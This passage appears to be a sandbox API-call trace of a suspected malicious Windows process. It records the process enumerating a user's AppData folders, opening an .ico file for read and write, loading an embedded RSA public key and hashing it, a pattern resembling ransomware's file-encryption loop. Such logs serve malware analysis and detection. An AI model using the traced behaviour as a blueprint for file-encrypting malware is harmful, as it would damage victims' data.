0x2d47a88 [0196.659] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.659] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\") returned="Internet Explorer\\" [0196.659] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0196.659] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0196.659] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0196.660] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47a88 | out: hHeap=0x6a0000) returned 1 [0196.660] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0196.660] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0196.660] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c700d0 | out: hHeap=0x6a0000) returned 1 [0196.660] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\") returned="LocalLow\\" [0196.660] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2cf20 [0196.661] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0196.661] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\") returned="AppData\\" [0196.661] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0196.661] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2cf20 | out: hHeap=0x6a0000) returned 1 [0196.661] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0196.661] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0196.662] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0196.662] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0196.662] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0196.662] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0196.662] PathFindFileNameW (pszPath="") returned="" [0196.662] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.662] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\*" (normalized: "c:\\users\\keecfmwgj\\appdata\\locallow\\microsoft\\internet explorer\\services\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50fdc710, ftCreationTime.dwHighDateTime=0x1d7b064, ftLastAccessTime.dwLowDateTime=0x7525ca20, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x7525ca20, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa90 [0196.664] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.665] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50fdc710, ftCreationTime.dwHighDateTime=0x1d7b064, ftLastAccessTime.dwLowDateTime=0x7525ca20, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x7525ca20, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0196.665] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7525ca20, ftCreationTime.dwHighDateTime=0x1d7b064, ftLastAccessTime.dwLowDateTime=0x7525ca20, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x7525ca20, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x10be, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico", cAlternateFileName="SEARCH~1.ICO")) returned 1 [0196.665] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.665] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0196.665] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.665] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico") returned=".ico" [0196.665] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico" (normalized: "c:\\users\\keecfmwgj\\appdata\\locallow\\microsoft\\internet explorer\\services\\search_{0633ee93-d776-472f-a0ff-e1416b8b2e3a}.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0196.667] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=4286) returned 1 [0196.667] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0196.670] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x1098, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.670] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0196.671] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0196.672] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0196.672] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0196.672] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x10be, lpOverlapped=0x0) returned 1 [0196.673] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.673] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0196.673] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.673] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.673] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea920) returned 1 [0196.675] CryptCreateHash (in: hProv=0x6ea920, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0196.675] CryptHashData (hHash=0x2cbf990, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0196.675] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0196.675] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0196.675] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0196.675] GetLastError () returned 0x0 [0196.675] CryptDestroyHash (hHash=0x2cbf990) returned 1 [0196.675] CryptReleaseContext (hProv=0x6ea920, dwFlags=0x0) returned 1 [0196.676] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0196.676] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0196.676] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0196.676] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0196.676] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0196.676] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0196.676] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0196.676] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c0) returned 0x2d3a670 [0196.676] SetFilePointer (in: hFile=0x52c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0196.677] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0196.677] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0196.677] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0196.677] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0196.677] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0196.677] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2cf20 [0196.677] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a288 [0196.677] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2cf68 [0196.677] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a2a0 [0196.677] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a2d0 [0196.677] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a330 [0196.677] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a2e8 [0196.677] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0196.677] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0196.677] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0196.677] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0196.677] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a2d0 | out: hHeap=0x6a0000) returned 1 [0196.677] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a2e8 | out: hHeap=0x6a0000) returned 1 [0196.678] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a330 | out: hHeap=0x6a0000) returned 1 [0196.678] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0196.679] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0196.679] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a330 [0196.679] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0196.679] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a2e8 [0196.679] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0196.679] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d3a2d0 [0196.679] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0196.679] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c31700 [0196.679] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0196.679] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0196.679] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0196.679] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0196.679] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c443e8 [0196.679] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0196.680] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0196.680] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a2e8 | out: hHeap=0x6a0000) returned 1 [0196.680] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0196.680] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a2d0 | out: hHeap=0x6a0000) returned 1 [0196.680] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0196.680] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0196.680] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a330 | out: hHeap=0x6a0000) returned 1 [0196.680] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0196.681] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0196.681] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0196.681] GetCurrentThreadId () returned 0x264 [0196.681] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0196.681] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d474d0 [0196.681] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84cc0 [0196.681] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea920 [0196.681] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0196.681] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0196.681] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0196.682] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0196.682] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0196.682] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0196.682] GetCurrentThreadId () returned 0x264 [0196.682] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0196.682] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0196.682] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2c03ca0 [0196.683] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0196.683] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0196.683] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0196.683] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0196.684] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0196.684] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0196.684] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0196.684] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a60 [0196.684] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0196.684] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c0ec50 [0196.684] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0196.684] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a330 [0196.684] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0196.684] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0196.684] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0196.684] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0196.684] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0196.684] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37800 [0196.684] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0196.684] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0196.685] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a2d0 [0196.685] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0196.685] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0196.685] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0196.685] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0196.685] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0196.685] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0196.685] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0196.685] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a2e8 [0196.685] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0196.685] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0196.685] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0196.685] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a2b8 [0196.685] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0196.685] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a348 [0196.685] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0196.685] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378c0 [0196.685] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0196.685] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a318 [0196.686] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0196.686] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a300 [0196.686] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0196.686] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a360 [0196.686] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a300 | out: hHeap=0x6a0000) returned 1 [0196.686] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a300 [0196.686] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a318 | out: hHeap=0x6a0000) returned 1 [0196.686] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0196.686] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0196.686] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0196.686] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0196.686] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0196.686] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a2d0 | out: hHeap=0x6a0000) returned 1 [0196.686] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a2d0 [0196.686] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0196.686] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2ccdff0 [0196.686] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a330 | out: hHeap=0x6a0000) returned 1 [0196.686] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0196.686] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a360 | out: hHeap=0x6a0000) returned 1 [0196.686] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0196.687] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0196.687] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c0d0a0 [0196.687] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0196.687] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0196.687] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a2d0 | out: hHeap=0x6a0000) returned 1 [0196.687] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0196.687] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0196.687] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0196.687] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0196.688] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea920 | out: hHeap=0x6a0000) returned 1 [0196.688] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0196.688] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0196.688] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0196.689] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0196.689] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0196.689] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0196.690] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0d0a0 | out: hHeap=0x6a0000) returned 1 [0196.690] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0196.690] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a300 | out: hHeap=0x6a0000) returned 1 